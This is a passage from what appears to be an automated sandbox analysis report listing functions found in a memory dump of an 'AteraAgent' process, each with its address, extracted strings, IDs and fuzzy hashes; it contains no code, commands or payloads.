                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41c0121ea9541b8e167d2f12d2ff17b0366cc72b4f9e47baed80cb80f89f3aaa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80B13A30A0DB4ACFF764ABA894502B977D1EF47390F14817AD46EC71E2DD2B684983D1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47F245 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0W=
                                                                                                                                                                                                                                                                            • API String ID: 0-2879975314
                                                                                                                                                                                                                                                                            • Opcode ID: a17659dbd6341ffdccf68f7d166fe6d4e02063f12252348237ba12b711e24e76
                                                                                                                                                                                                                                                                            • Instruction ID: 73793297d98ac2b366d568c3ae7047232eac86c78e7bded868064d0b414c6c6d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a17659dbd6341ffdccf68f7d166fe6d4e02063f12252348237ba12b711e24e76
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50A15831A0EACA8FE755D72CC4515B477D1EF9A391B1445FAD04CCB6A2CD18AC8AC3C2
                                                                                                                                                                                                                                                                            Function 00007FFAAB463FCD Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: p[5
                                                                                                                                                                                                                                                                            • API String ID: 0-4051682499
                                                                                                                                                                                                                                                                            • Opcode ID: e2a911af201c8e7ec61881bf22f145c22a6a27ad80f84944de622c6c90cc96fb
                                                                                                                                                                                                                                                                            • Instruction ID: eb9a33a79cd72d930ffb8fe1501fd0d894570caa5f4336a9a47bc7044db2d328
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2a911af201c8e7ec61881bf22f145c22a6a27ad80f84944de622c6c90cc96fb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9A10471C0A65D8FEB54DB64C4557F8BBE0EF53380F5442BAD04CD72E2EA38684A8B81
                                                                                                                                                                                                                                                                            Function 00007FFAAB473C20 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: b43
                                                                                                                                                                                                                                                                            • API String ID: 0-515797068
                                                                                                                                                                                                                                                                            • Opcode ID: bbf3976b1fa01cc0ede012873ed44361be636790d4dccb290c887aa8db521797
                                                                                                                                                                                                                                                                            • Instruction ID: f94331722c442c97659f5fb064d1b6831bccd5556457a2a33cc7256de9155ba9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbf3976b1fa01cc0ede012873ed44361be636790d4dccb290c887aa8db521797
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D91553061DB498FE359EB28D4855B67BE0EF96350F14467ED48EC32A2DE24F886C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB47FA29 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: BK_H
                                                                                                                                                                                                                                                                            • API String ID: 0-699573682
                                                                                                                                                                                                                                                                            • Opcode ID: d69f998abeb39bc891d23a1eb9cbd3a2c27c40ea18c588143d2facbf36469dba
                                                                                                                                                                                                                                                                            • Instruction ID: 9b99dacbdac06ddffc6ae9ef1c23eaa952e0bc23ab4235a59acfe94089ce739f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d69f998abeb39bc891d23a1eb9cbd3a2c27c40ea18c588143d2facbf36469dba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3581E571A19A8D8FDB85EB68C4546AD7BF1FF6A340F0441B6D40CD72A6CA34EC4AC780
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A0A0 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 'R_L
                                                                                                                                                                                                                                                                            • API String ID: 0-835780197
                                                                                                                                                                                                                                                                            • Opcode ID: ca6adbf4c48e96ddb6da05dc3f805816b1012ab8599a07e5555b957256090c24
                                                                                                                                                                                                                                                                            • Instruction ID: 3af97aab218b504ba89f93a8c299c7a410b8ec0940fdf43b8e84991de6dd53cc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca6adbf4c48e96ddb6da05dc3f805816b1012ab8599a07e5555b957256090c24
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48710A61B1DE498FE798EB2C941963837D2EF9A39079401BAE44DC73A3DD24AC4583C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB479C20 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /3
                                                                                                                                                                                                                                                                            • API String ID: 0-2516180287
                                                                                                                                                                                                                                                                            • Opcode ID: c52d0974eefb7bca5061cebbdf5a23ff64ea359fa723e2dd2d4ae72fede4ab8f
                                                                                                                                                                                                                                                                            • Instruction ID: 6828a9c7829c9b1f53ca2c2144e8334319a5fc3966ecde60bbdccf9e021b4541
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c52d0974eefb7bca5061cebbdf5a23ff64ea359fa723e2dd2d4ae72fede4ab8f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B710631A1DA49DFEB69D72C849957577D1FF5A340B1444BED08EC32A2CE28BC89C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB4882D3 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63
                                                                                                                                                                                                                                                                            • API String ID: 0-3819469774
                                                                                                                                                                                                                                                                            • Opcode ID: 6e73426913301d4cb369da6b7eb9da360dd798e1d26dadd1071d6774685bbbfe
                                                                                                                                                                                                                                                                            • Instruction ID: eb8f1a4a750e0a2c714b29dd98dcd43a2fffed6301723c35ca49d8d67bf770fe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e73426913301d4cb369da6b7eb9da360dd798e1d26dadd1071d6774685bbbfe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E91B030A18A49CFDB98DB18C855BB87BE2FF59344F1042B8E45DD72A2CA34EC45CB81
                                                                                                                                                                                                                                                                            Function 00007FFAAB48830F Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63
                                                                                                                                                                                                                                                                            • API String ID: 0-3819469774
                                                                                                                                                                                                                                                                            • Opcode ID: d69cd3ddea97a94cd63fc413f4a74e6040712ad70da413a1057587c834dadc6d
                                                                                                                                                                                                                                                                            • Instruction ID: dc74e8feed9317a28f813af09b73472d83a4ccefd72d2928145a1c3eb426e3b1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d69cd3ddea97a94cd63fc413f4a74e6040712ad70da413a1057587c834dadc6d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1818330A19A49CFDB98EB58C855BB83BE2FF59344F1442B8D45DD72A2CA34EC45C781
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C928 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: MG_H
                                                                                                                                                                                                                                                                            • API String ID: 0-2026589312
                                                                                                                                                                                                                                                                            • Opcode ID: c9e8a0ec35d957e5d8f6eb2f603d6c7b7e1abe150e3ebb0d4a5aff7893ac8030
                                                                                                                                                                                                                                                                            • Instruction ID: 2ab64846a21d5dbd6d6625c2bad6aa27f7f8e9e9edc12168d5d943c75450eb93
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9e8a0ec35d957e5d8f6eb2f603d6c7b7e1abe150e3ebb0d4a5aff7893ac8030
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07610A30B09D19CFDF98EB5CD498AB977E2FF69351B4040B9E14EDB2A1CE24AC458780
                                                                                                                                                                                                                                                                            Function 00007FFAAB468A55 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: p[5
                                                                                                                                                                                                                                                                            • API String ID: 0-4051682499
                                                                                                                                                                                                                                                                            • Opcode ID: 88ce328955344c0104630f4695e11c1b63a8f1999235b16de8089fe6c82cc928
                                                                                                                                                                                                                                                                            • Instruction ID: 403ce9da5110168ea2ad4e335ab1e8a17f7bf509886cb4e75d312c6b80cbb556
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88ce328955344c0104630f4695e11c1b63a8f1999235b16de8089fe6c82cc928
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B71CF70D0A64D8FDB559B68D8216EDBFB0EF56340F1441BBD00DDB2A2CB38694AC7A1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46D0C0 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ^L_^
                                                                                                                                                                                                                                                                            • API String ID: 0-3269914177
                                                                                                                                                                                                                                                                            • Opcode ID: e8dd29893bc1e211f88f0f1f79dca3e637a31f4069378327f6931994175eb46d
                                                                                                                                                                                                                                                                            • Instruction ID: ebb38d0b766f16d42e8fc05649bcc8437e448771e0e1103f182d7c611b5f81f4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8dd29893bc1e211f88f0f1f79dca3e637a31f4069378327f6931994175eb46d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E51B367A4C7915FD302B77CE4661E83BF4EF8327570A45F7D089CA0A3E9182C4A8396
                                                                                                                                                                                                                                                                            Function 00007FFAAB468AA5 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: p[5
                                                                                                                                                                                                                                                                            • API String ID: 0-4051682499
                                                                                                                                                                                                                                                                            • Opcode ID: 0125629e9562388cff48319a38a7753040f8250a609e7338d12a8725a07aeae9
                                                                                                                                                                                                                                                                            • Instruction ID: 1010570bcd783ce0f83b5b0178b6268c592a5478a0247c102636a031faa12518
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0125629e9562388cff48319a38a7753040f8250a609e7338d12a8725a07aeae9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0751E57090A7888FDB45DB68C8216EDBFF0EF16340F1441BBD04DDB2A2CB28194AC7A1
                                                                                                                                                                                                                                                                            Function 00007FFAAB475A1A Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: kq
                                                                                                                                                                                                                                                                            • API String ID: 0-1161455450
                                                                                                                                                                                                                                                                            • Opcode ID: 182a69ced68133fdf4faa221e6c77b3714ffb455de0075f4b1802d0dde10be95
                                                                                                                                                                                                                                                                            • Instruction ID: 45e2eebdf6e2cb955a98973e5b665933212379b5b12ae03b6007f9681d312ca7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 182a69ced68133fdf4faa221e6c77b3714ffb455de0075f4b1802d0dde10be95
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B41D52171EB898FF35AA73C98506757BE1EF97244B1841FBE04DCB2A3CC155C8583A2
                                                                                                                                                                                                                                                                            Function 00007FFAAB4709C0 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0p=
                                                                                                                                                                                                                                                                            • API String ID: 0-2527772663
                                                                                                                                                                                                                                                                            • Opcode ID: 82209ec155e6ba32c6c767a9fcdcdff4ef7be007d5600e6e9295236843fdc299
                                                                                                                                                                                                                                                                            • Instruction ID: 2d027ea7b2268e80fccf52419f2a12200240090551f76661807587d55d536cae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82209ec155e6ba32c6c767a9fcdcdff4ef7be007d5600e6e9295236843fdc299
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0411A3270AA094FD784EB2CE814BB9B7D1EFE9355F4442BAE44DC73A2DD19984583C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB463C3D Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: p[5
                                                                                                                                                                                                                                                                            • API String ID: 0-4051682499
                                                                                                                                                                                                                                                                            • Opcode ID: 8ef246300c6c95c4836097421a8e98e38c61add621e6c07f2a705e2eaf90de25
                                                                                                                                                                                                                                                                            • Instruction ID: b201703b010b58f372330d9bdd76d484affc13a3cf3fe6511ddbc7f85e07661a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef246300c6c95c4836097421a8e98e38c61add621e6c07f2a705e2eaf90de25
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0417C71D0978D8FDB58DB68C4556ADBBF1FF56340F14417AE00DD72A2CA38684ACB90
                                                                                                                                                                                                                                                                            Function 00007FFAAB479634 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: yb_H
                                                                                                                                                                                                                                                                            • API String ID: 0-956606333
                                                                                                                                                                                                                                                                            • Opcode ID: 8bfc1634ff3446ac1d505aeef29a0c03fbe6be073af2ffa12c5f5d5df3271878
                                                                                                                                                                                                                                                                            • Instruction ID: 3f86f8a19f2af1e2b477859485f3dc2ace899a4972d41043d311564d3fb4bc2e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bfc1634ff3446ac1d505aeef29a0c03fbe6be073af2ffa12c5f5d5df3271878
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72412C61A0E6859FE795D72C848D7B97BD1EF96340F4845FDC08CCB1B2DA34A84AC381
                                                                                                                                                                                                                                                                            Function 00007FFAAB46EA2D Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 8h5
                                                                                                                                                                                                                                                                            • API String ID: 0-2314399704
                                                                                                                                                                                                                                                                            • Opcode ID: 48b9992bb27812d0c016fcde65a9b0fa924b227cae7746da8e0f03929eed597a
                                                                                                                                                                                                                                                                            • Instruction ID: dd650db1ffceec487a3149b939198fa7228bb7472f8ebbc1d89db7242e1051c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48b9992bb27812d0c016fcde65a9b0fa924b227cae7746da8e0f03929eed597a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3415B77A086499BE354F76CE8665F9B7E4FF81326F0401BBE00CC61A3DD2428868BC1
                                                                                                                                                                                                                                                                            Function 00007FFAAB467130 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: X`=
                                                                                                                                                                                                                                                                            • API String ID: 0-1948173163
                                                                                                                                                                                                                                                                            • Opcode ID: ba9b3de6dd0ad70c5e61bb4fde6e3ede9603e9b51e49da6d10faa9912fc77883
                                                                                                                                                                                                                                                                            • Instruction ID: 72303001c6bee46ea8e42bb2db7f865aba226c9378e358f3011d1e10c78680db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba9b3de6dd0ad70c5e61bb4fde6e3ede9603e9b51e49da6d10faa9912fc77883
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231F370B1DA099FE768DB1C986957DB7E1EF9A351B1441BEE04DC32A3CE20AC0687C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46CFF7 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: tL_^
                                                                                                                                                                                                                                                                            • API String ID: 0-225026331
                                                                                                                                                                                                                                                                            • Opcode ID: 9101fdada49bfdf323b003a65790a7a5c969ba1061798b88c72ec983b206cad2
                                                                                                                                                                                                                                                                            • Instruction ID: 6ab5ce3c1aff9606df823a9bbd4ca659316ca02248e04867b5540f958ee25bfa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9101fdada49bfdf323b003a65790a7a5c969ba1061798b88c72ec983b206cad2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31AE27D0C656ABE701B73CE8994FA7BE4EF82365B094177D04DCA0B3DE14644A86C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB484340 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /3
                                                                                                                                                                                                                                                                            • API String ID: 0-2516180287
                                                                                                                                                                                                                                                                            • Opcode ID: bca7ae55d189db41a5742240d1c7b742ef428931d5558a3a0d8b0ea16db3572a
                                                                                                                                                                                                                                                                            • Instruction ID: 7e05a3e2fd7ce51acc15534db028ef4f93781df6fe6980c68aa0f97c284a8efe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bca7ae55d189db41a5742240d1c7b742ef428931d5558a3a0d8b0ea16db3572a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F314330A18E128FE369C778D490AB177D1EF55300F14807CC0AEC32A6EA29B88AC7C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB484AE2 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: r63
                                                                                                                                                                                                                                                                            • API String ID: 0-1294201789
                                                                                                                                                                                                                                                                            • Opcode ID: 514cafc1d9ea88b6e517f49e01e4603dba05b649d294806a2f0f16b5e73ec01e
                                                                                                                                                                                                                                                                            • Instruction ID: 2ddb1a07e6814de6dd864097f3f73513aef826d7afa6d2448f5a5df3c550e370
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 514cafc1d9ea88b6e517f49e01e4603dba05b649d294806a2f0f16b5e73ec01e
